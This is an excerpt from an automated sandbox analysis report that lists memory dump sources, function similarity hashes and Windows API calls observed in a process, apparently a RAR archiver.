                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                                                                                                              • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                              • Instruction ID: a5a589ea4b56c12e3ae1473805056d1b2454d0c6c2c5aed642c8ee8c38d83563
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C611D632B0568186F758CF2AE4043AA32A2FBDCB58F188539CB4D4B669CF7DD456C780
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 904936192-0
                                                                                                                                                                                                                              • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                              • Instruction ID: 0ff45f15d37238b6d81994ede0f3b9cb566d66393e7a1f04ca8d76d8aea5f286
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F51E162A1AA8581EB58CF2AD4603AD73A1FB88B98F448335DF5E877A5DF7CD511C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF6BBCCF6FC,00000000,?,?,?,?,00007FF6BBCD097D), ref: 00007FF6BBCD38CD
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,00007FF6BBCCF6FC,00000000,?,?,?,?,00007FF6BBCD097D,?,?,00000000), ref: 00007FF6BBCD391F
                                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00007FF6BBCCF6FC,00000000,?,?,?,?,00007FF6BBCD097D,?,?,00000000), ref: 00007FF6BBCD399B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00007FF6BBCCF6FC,00000000,?,?,?,?,00007FF6BBCD097D,?,?,00000000), ref: 00007FF6BBCD39A6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2287278272-0
                                                                                                                                                                                                                              • Opcode ID: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                              • Instruction ID: 402c295a393061b9c89e9c9b36b88252d5370bf722e2be28b44faf20d67d7b1c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F41D026B8C68242EA54CB19B41977A66B1BBC97A4F504231EF9D877F4DF3CD4098700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                              • Instruction ID: 20ebc6495e615453022bea2edd0ae11cccdb016b6f05bf197c72b8d69653c724
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F341E751E0CAC699EB5ADB29D0703FD2390FF48B84F980A32DB4D867A9DF2CE4458314
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4141327611-0
                                                                                                                                                                                                                              • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                              • Instruction ID: f0ab6bc7c17a318c3a9382fbdbf2b2f25fb7f6ba114c61f037e101ed7aa1bd68
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6417422A0D79246FB6A8A59D050379B691FF48B94F5C4331DF4D86AE9DF3CE4818B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF6BBCB86CB,?,?,?,00007FF6BBCBA5CB,?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2DF9), ref: 00007FF6BBCCD09D
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF6BBCB86CB,?,?,?,00007FF6BBCBA5CB,?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2DF9), ref: 00007FF6BBCCD0E5
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF6BBCB86CB,?,?,?,00007FF6BBCBA5CB,?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2DF9), ref: 00007FF6BBCCD114
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF6BBCB86CB,?,?,?,00007FF6BBCBA5CB,?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2DF9), ref: 00007FF6BBCCD15C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                              • Instruction ID: 0ea5d7963f3b8b8035f744060ace3f2121ef995ccf5a173bcb3785721842af96
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE316C32618B8582E7608F15E5587AA77A0F789BB8F505329EBAC47BD8CF3CD0448B44
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1171435874-0
                                                                                                                                                                                                                              • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                              • Instruction ID: 5802ce86221d8b65febfd05e18665a82855db271f53f8ab24b8742fc39a73979
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8115E32E08642CBF665CB18E49823C6271FFAC744F200474C70E976A1DF2CB84D5704
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1447195878-0
                                                                                                                                                                                                                              • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                              • Instruction ID: f5399774227cd9553d3ee0b274ecd41352ee2c8bd120fd2cb602ac1d5c00702d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56019E20B0E65346FA5CA73DD65513C5191BF4CBC8F084738DB1E86BF2ED2DE8014A44
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 502429940-0
                                                                                                                                                                                                                              • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                              • Instruction ID: f1f8d544e9aaece3cf0d2240f9d6c97760935cc726a522e4a9591444f10d27a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F115E32A14A819BE618DF29E95466DA330FB8EBA0F100331DBAD536B5CF39E475C744
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                              • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                              • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                              • Instruction ID: 13a04e24f140839cdb1d067a46b39c20605fc959d9a6b23dc2a82410b2bddb73
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85911862B0A39646EB198F2DE18037C6B55BB697D4F088232CB8D877A5DE3DE511C301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCFB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6BBCCCBED,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCFB730
                                                                                                                                                                                                                              • new.LIBCMT ref: 00007FF6BBCECFD9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                              • String ID: rar$rev
                                                                                                                                                                                                                              • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                              • Opcode ID: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
                                                                                                                                                                                                                              • Instruction ID: bee6decd8242054e41c828aeefc14bd2c69e487eb063f63b71c1fc74301f2931
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEA1BF22A28692C2EA24DB28D45E2BD6375FF4C794F554032EB5D8B6E6EF2CF544C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
